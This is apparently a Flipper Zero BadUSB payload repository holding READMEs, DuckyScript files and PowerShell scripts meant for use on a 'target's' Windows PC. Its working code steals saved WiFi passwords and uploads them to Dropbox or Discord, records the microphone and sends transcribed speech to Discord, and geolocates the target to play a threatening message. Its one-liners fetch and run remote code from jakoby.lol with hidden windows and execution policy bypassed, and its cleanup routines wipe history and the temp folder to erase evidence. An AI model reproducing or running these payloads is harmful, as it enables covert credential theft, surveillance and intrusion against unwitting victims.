"![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# We-Found-You\n\nThis script is ready to run as is. Just download and execute with the provided link. \n\n## Description\n\nThis script will get the GeoLocation (Latitude and Longitude) of your target. \nThen a page will open in their browser with a map of their current location on it.\nTheir system volume will be turned to max level.\nSAPI speak with talk through their speakers the message provided or a custom one you provide.\n\n![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/RubberDucky/Payloads/RD-We-Found-You/location.jpg)\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n* Their location services are turned on\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-We-Found-You/We-Found-You.txt", "content": "REM Title: We-Found-You\r\n\r\nREM Author: I am Jakoby\r\n\r\nREM Description: This payload is meant to open a map in your target's web browser with their current location.\r\n\r\nREM Target: Windows 10, 11\r\n\r\nREM --------------------------------------------------------------------------------------\r\nREM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.\r\nREM --------------------------------------------------------------------------------------\r\n\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex\r\nENTER\r\n" }, { "path": "Payloads/Flip-We-Found-You/found-you.ps1", "content": "############################################################################################################################################################ \r\n# | ___ _ _ _ # ,d88b.d88b # \r\n# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \r\n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \r\n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\r\n# Category : Prank | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\r\n# Target : Windows 7,10,11 | |___/ # /\\/|_ __/\\\\ # \r\n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \r\n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \r\n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \r\n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \r\n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\r\n# tiktok.com/@i_am_jakoby # / \\ / ~ \\ #\r\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \r\n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \r\n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \r\n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\r\n############################################################################################################################################################\r\n\r\n<#\r\n.NOTES\r\n\tThe target's Location Services must be turned on or this payload will not work.\r\n\r\n.SYNOPSIS\r\n\tThis script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are. \r\n\r\n.DESCRIPTION \r\n\tThis program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.\r\n\tThe SSID and WiFi password of any current or previously connected to networks.\r\n\tIt determines the last day they changed their password and how many days ago.\r\n\tOnce the information is gathered, the script will pause until a mouse movement is detected.\r\n\tThen the script uses Sapi speak to roast their set up and lack of security.\r\n#>\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to get the name associated with the targets Microsoft account, if not detected UserName will be used. \r\n#>\r\n\r\nfunction Get-fullName {\r\n\r\n try {\r\n\r\n $fullName = Net User $Env:username | Select-String -Pattern \"Full Name\";$fullName = (\"$fullName\").TrimStart(\"Full Name\")\r\n\r\n }\r\n \r\n # If no name is detected function will return $env:UserName \r\n\r\n # Write Error is just for troubleshooting \r\n catch {Write-Error \"No name was detected\" \r\n return $env:UserName\r\n -ErrorAction SilentlyContinue\r\n }\r\n\r\n return $fullName \r\n\r\n}\r\n\r\n$FN = Get-fullName\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to get the current Latitude and Longitude of your target\r\n#>\r\n\r\nfunction Get-GeoLocation{\r\n\ttry {\r\n\tAdd-Type -AssemblyName System.Device #Required to access System.Device.Location namespace\r\n\t$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object\r\n\t$GeoWatcher.Start() #Begin resolving current locaton\r\n\r\n\twhile (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {\r\n\t\tStart-Sleep -Milliseconds 100 #Wait for discovery.\r\n\t} \r\n\r\n\tif ($GeoWatcher.Permission -eq 'Denied'){\r\n\t\tWrite-Error 'Access Denied for Location Information'\r\n\t} else {\r\n\t\t$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.\r\n\t\t\r\n\t}\r\n\t}\r\n # Write Error is just for troubleshooting\r\n catch {Write-Error \"No coordinates found\" \r\n return \"No Coordinates found\"\r\n -ErrorAction SilentlyContinue\r\n } \r\n\r\n}\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to pause the script until a mouse movement is detected\r\n#>\r\n\r\nfunction Pause-Script{\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\r\n$o=New-Object -ComObject WScript.Shell\r\n\r\n while (1) {\r\n $pauseTime = 3\r\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\r\n break\r\n }\r\n else {\r\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\r\n }\r\n }\r\n}\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n$GL = Get-GeoLocation\r\n\r\n$GL = $GL -split \" \"\r\n\r\n$Lat = $GL[0].Substring(11) -replace \".$\"\r\n\r\n$Lon = $GL[1].Substring(10) -replace \".$\"\r\n\r\nPause-Script\r\n\r\n# Opens their browser with a map of their current location\r\n\r\nStart-Process \"https://www.latlong.net/c/?lat=$Lat&long=$Lon\"\r\n\r\nStart-Sleep -s 3\r\n\r\n# Sets Volume to max level\r\n\r\n$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}\r\n\r\n# Sets up speech module \r\n\r\n$s=New-Object -ComObject SAPI.SpVoice\r\n$s.Rate = -2\r\n$s.Speak(\"We found you $FN\")\r\n$s.Speak(\"We know where you are\")\r\n$s.Speak(\"We are everywhere\")\r\n$s.Speak(\"We do not forgive, we do not forget\")\r\n$s.Speak(\"Expect us\")\r\n\r\n\r\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n<#\r\n\r\n.NOTES \r\n\tThis is to clean up behind you and remove any evidence to prove you were there\r\n#>\r\n\r\n# Delete contents of Temp folder \r\n\r\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\r\n\r\n# Delete run box history\r\n\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\r\n\r\n# Delete powershell history\r\n\r\nRemove-Item (Get-PSreadlineOption).HistorySavePath\r\n\r\n# Deletes contents of recycle bin\r\n\r\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\r\n" }, { "path": "Payloads/Flip-WifiGrabber/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Wifi-Grabber\n\n## Description\n\nThis payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n\n`$dc` is the variable that stores your Discord webhook \n\n`$db` is the variable that stores your Dropbox token \n\nFill in either or both of these to methods to exfil your collected data\n\n```\npowershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/Flip-WifiGrabber/WifiGrabber.ps1", "content": "############################################################################################################################################################\n\n$wifiProfiles = (netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String\n\n\n$wifiProfiles > $env:TEMP/--wifi-pass.txt\n\n############################################################################################################################################################\n\n# Upload output file to Dropbox\n\nfunction DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $db\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nif (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt}\n\n############################################################################################################################################################\n\nfunction Upload-Discord {\n\n[CmdletBinding()]\nparam (\n [parameter(Position=0,Mandatory=$False)]\n [string]$file,\n [parameter(Position=1,Mandatory=$False)]\n [string]$text \n)\n\n$hookurl = \"$dc\"\n\n$Body = @{\n 'username' = $env:username\n 'content' = $text\n}\n\nif (-not ([string]::IsNullOrEmpty($text))){\nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};\n\nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F \"file1=@$file\" $hookurl}\n}\n\nif (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file \"$env:TEMP/--wifi-pass.txt\"}\n\n \n\n############################################################################################################################################################\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f \n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n############################################################################################################################################################\n\nif (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}\n\n\nRI $env:TEMP/--wifi-pass.txt\n" }, { "path": "Payloads/Flip-WifiGrabber/WifiGrabber.txt", "content": "REM Title: Wifi Grabber\n\nREM Author: I am Jakoby\n\nREM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex\nENTER\n" }, { "path": "Payloads/Flip-YT-Tripwire/ReadMe.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# YouTube Tripwire\n\nPlays any YouTube video after a mouse movement is detected.\n\n## Description\n\nThis script is a one liner that can fit in the runbox by itself.\nJust replace the URL for the YouTube video and run it.\nYou can now unplug your device and walk away.\nWhen your target returns and moves their mouse, the video will start playing full screen.\n\n## Getting Started\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Walk away\n* You can run the example snippet below and it will open up a video covering one of my other payloads\n* You can of course replace the URL with your own video\n```\npowershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')\n```\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "Payloads/Flip-YT-Tripwire/YouTube-TripWire.txt", "content": "REM Title: YouTube-TripWire\nREM Author: I am Jakoby\nREM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)\nREM Target: Windows 10, 11\nGUI r\nDELAY 500\nSTRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')\nENTER\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "Payloads/Scripts/WifiPasswords.ps1", "content": "# https://jakoby.lol/n89\n\n(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String\n" }, { "path": "Payloads/VoiceLogger/VL.ps1", "content": "function DC-Upload {\n\n\t[CmdletBinding()]\n\tparam (\n\t\t[parameter(Position=0,Mandatory=$False)]\n\t\t[string]$text \n\t)\n\n\t# $dc = 'YOUR DISCORD WEBHOOK GOES HERE IF YOU HOST YOUR OWN VERSION OF THIS PAYLOAD'\n\n\t$Body = @{\n\t 'username' = $env:username\n\t 'content' = $text\n\t}\n\n\tif (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)};\n}\n\n\n\nfunction voiceLogger {\n\n Add-Type -AssemblyName System.Speech\n $recognizer = New-Object System.Speech.Recognition.SpeechRecognitionEngine\n $grammar = New-Object System.Speech.Recognition.DictationGrammar\n $recognizer.LoadGrammar($grammar)\n $recognizer.SetInputToDefaultAudioDevice()\n\n while ($true) {\n $result = $recognizer.Recognize()\n if ($result) {\n $results = $result.Text\n Write-Output $results\n $log = \"$env:tmp/VoiceLog.txt\"\n echo $results > $log\n $text = get-content $log -raw\n DC-Upload $text\n\n # Use a switch statement with the $results variable\n switch -regex ($results) {\n '\\bnote\\b' {saps notepad}\n '\\bexit\\b' {break}\n }\n }\n }\n Clear-Content -Path $log\n}\n\nvoiceLogger\n" }, { "path": "Payloads/VoiceLogger/VoiceLogger.txt", "content": "REM Title: VoiceLogger\n\nREM Author: I am Jakoby\n\nREM This payload activates your targets microphone and converts their speech to text and exfils it to discord\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -Ep Bypass $dc='';irm jakoby.lol/voiceLogger | iex\nENTER\n" }, { "path": "Payloads/VoiceLogger/readme.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# VoiceLogger\n\n## Description\n\nThis payload activates your target's microphone, converts their speech to text, and exfils it to Discord \nwith the optional functionality of incorporating voice activated payloads.\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n\n`$dc` is the variable that stores your Discord webhook \n\n```\npowershell -w h -NoP -Ep Bypass $dc='';irm jakoby.lol/voiceLogger | iex\n```\n\n### The Function\n\n- The voiceLogger function leverages the System.Speech namespace to create a continuous speech-to-text logger. \n- It initializes a speech recognition engine, loads a dictation grammar, and sets the input to the default audio device. \n- The script then enters an infinite loop where it listens for speech input and recognizes the text. \n- The recognized text is written to the output and saved to a temporary log file. \n- The log file content is then uploaded using the DC-Upload function. \n- Additionally, the script checks for specific voice commands using a switch statement with regex patterns: if the word \"notepad\" is detected, it launches Notepad, \n- and if the word \"exit\" is detected, it breaks the loop and stops the voice logger. \n- Once the loop is terminated, the log file's content is cleared.\n\n```powershell\nfunction voiceLogger {\n\n Add-Type -AssemblyName System.Speech\n $recognizer = New-Object System.Speech.Recognition.SpeechRecognitionEngine\n $grammar = New-Object System.Speech.Recognition.DictationGrammar\n $recognizer.LoadGrammar($grammar)\n $recognizer.SetInputToDefaultAudioDevice()\n\n while ($true) {\n $result = $recognizer.Recognize()\n if ($result) {\n $results = $result.Text\n Write-Output $results\n $log = \"$env:tmp/VoiceLog.txt\"\n echo $results > $log\n $text = get-content $log -raw\n DC-Upload $text\n\n # Use a switch statement with the $results variable\n switch -regex ($results) {\n '\\bnotepad\\b' {saps notepad}\n '\\bexit\\b' {exit}\n }\n }\n }\n Clear-Content -Path $log\n}\n```\n\n```mermaid\ngraph TB;\n A[Start voiceLogger] --> B[Start Listening]\n B --> C{Recognized text?}\n C -->|Yes| D[Write to console]\n D --> E[Save to file]\n E --> F[Send to Discord]\n F --> G{Keyword recognized?}\n G -->|'note'| H[Open Notepad]\n G -->|'exit'| I[Exit function]\n G -->|No keyword| B\n C -->|No| B\n I --> J[Clear Log]\n J --> K[End voiceLogger]\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributor's names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "Payloads/test.txt", "content": "#\nsaps calc\n" }, { "path": "README.md", "content": "
\n\n# πŸ’€ BadUSB πŸ’€\n\n

\n \n \"Python\"\n \t\n

\n\nSubscribing to my YouTube would also be greatly appreciated. \n\n[](https://jakoby.lol/yno)\n\n\"C#\"\n
\n\n# Table of Contents\n\n[Description](#Description)\n\n[The Payloads](#The-Payloads)\n\n[Contact](#Contact)\n\n[Acknowledgments](#Acknowledgments)\n\n\n\n# Unleash the power of your Flipper πŸ€“πŸ’»\n\n*** \n\n## Description \n\n\nπŸ₯‡ I am in 1st place for most payloads submitted to Hak5❗ \n\nπŸ”“ I have taken my colllection of payloads and formatted them to work for the Flipper for all of you to use❗\n\n⚠️ Please ENJOY and use RESPONSIBLY❗ \n\n![hak 5](https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/hak5-banner.png)\n\n## The Payloads \n\nThis repository has been optimized to facilitate plug and play functionality. \n\nI purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs.\n\nI did this with the intention of making room for Discord webhooks and Dropbox tokens to fit in my one-liners.\n\nThis, in turn, makes it so the user no longer needs to host their own version of the script.\n\n\n| Payloads | Description | Plug'n'Play | Author |\n| :-------------------------------------------------------------------------------------------------------------- | :------------------------------------------------------------------------------------------------ | :-----------| :-----------|\n| [VoiceLogger](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/VoiceLogger) | Activates your target's microphone, converts their speech to text, and exfils it to Discord. |βœ… | Jakoby |\n| [Evil-Goose](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-EvilGoose) | A payload that hires a goose to hack your target in real time. |βœ… | Jakoby | \n| [ADV-Recon](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-ADV-Recon) | A script used to do an advanced level of recon on the target's computer. |βœ… | Jakoby | \n| [AcidBurn](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-AcidBurn) | A script I put together to be used on your friends or foes. Prepare to be roasted. |βœ… | Jakoby | \n| [Jump-Scare](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-JumpScare) | Just a little jumpscare that changes the target's wallpaper. |βœ… | Jakoby |\n| [Jump-Scare V2](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-JumpScare-2.0) | Just a little jumpscare that plays a video in the target's PowerShell console. |βœ… | Jakoby |\n| [ADV-RickRoll](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-ADV-RickRoll) | RickRoll that plays in the PowerShell console after a mouse movement is detected. |βœ… | Jakoby |\n| [PineApple](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-PineApple) | Connect a target's PC to your WiFi PineApple. |β›” | Jakoby |\n| [Play-WAV](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Play-WAV) | Download a WAV file and play it after a mouse movement is detected. |βœ… | Jakoby |\n| [Rage-Pop-Ups](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Rage-PopUps) | Generates an infinite loop of insulting pop-ups. |β›” | Jakoby |\n| [Subscribe](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Subscribe) | Used to make your target subscribe to your YouTube channel. |βœ… | Jakoby | \n| [Must Sub](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-MustSub) | A script used to make your target subscribe to 15 of Jakoby's favorite YouTube channels. |βœ… | Jakoby |\n| [PS-Draw](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-PS-Draw) | A script used to generate and draw images in the PowerShell window. |β›” | Jakoby |\n| [WallPaper-Troll](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Wallpaper-Troll) | Collects sensitive info from your target and displays it as their wallpaper to taunt them. |βœ… | Jakoby |\n| [WallPaper-URL](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WallPaper-URL) | Sets the target's wallpaper to an image you provide via a URL after a mouse movement is detected. |βœ… | Jakoby |\n| [We-Found-You](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-We-Found-You) | Opens a map with your target's current location on it. |βœ… | Jakoby |\n| [YT-Tripwire](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-YT-Tripwire) | Opens any YouTube video after a mouse movement is detected. |βœ… | Jakoby |\n| [Credz-Plz](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Credz-Plz) | A script used to prompt the target to enter their credentials to later be exfiltrated. |βœ… | Jakoby |\n| [Shortcut Jacker](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-ShortcutJacker) | A script used to embed malware in the shortcut on your target's desktop. |β›” | Jakoby |\n| [Wifi Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-WifiGrabber)| Grabs your target's WiFi passwords and uploads them to either Dropbox, Discord, or both. |βœ… | Jakoby |\n| [IP Grabber](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-IP-Grabber) | Grabs your target's IP addresses and uploads them to either Dropbox, Discord, or both. |βœ… | Jakoby |\n| [Browser Data](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-BrowserData)| This payload can be used to retrieve the browsing history and bookmarks of your target. |βœ… | Jakoby |\n\n\n## Contact\n\n

πŸ“± My Socials πŸ“±

\n
\n\n \n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n 		\n \n \"Jsonnet\"\n \n
TikTok\n
\n
\n\n\n## Acknowledgments \n\n* [Hak5](https://hak5.org/)\n* [Darren](https://github.com/hak5darren)\n* [UberGuidoZ](https://github.com/UberGuidoZ)\n\n\n\n\n

(back to top)

\n\n" }, { "path": "index.html", "content": "\n\n \n My First HTML Page\n \n \n

Hello World!

\n

Welcome to my first HTML page. This is just a demo.

\n \n \n\n" }, { "path": "unload.ps1", "content": "# Set the destination directory on the desktop\r\n$dest = \"$env:USERPROFILE\\Desktop\\jakoby-payloads\"\r\n\r\n# Create the destination directory if it doesn't already exist\r\nif (-not (Test-Path $dest)) {\r\n New-Item -ItemType Directory -Path $dest | Out-Null\r\n}\r\n\r\n# Get all text files in the current directory and its subdirectories\r\n$textFiles = Get-ChildItem -Path . -Recurse -Include \"*.txt\" -File\r\n\r\n# Copy the text files to the destination directory\r\nforeach ($textFile in $textFiles) {\r\n Copy-Item -Path $textFile.FullName -Destination $dest\r\n}" } ]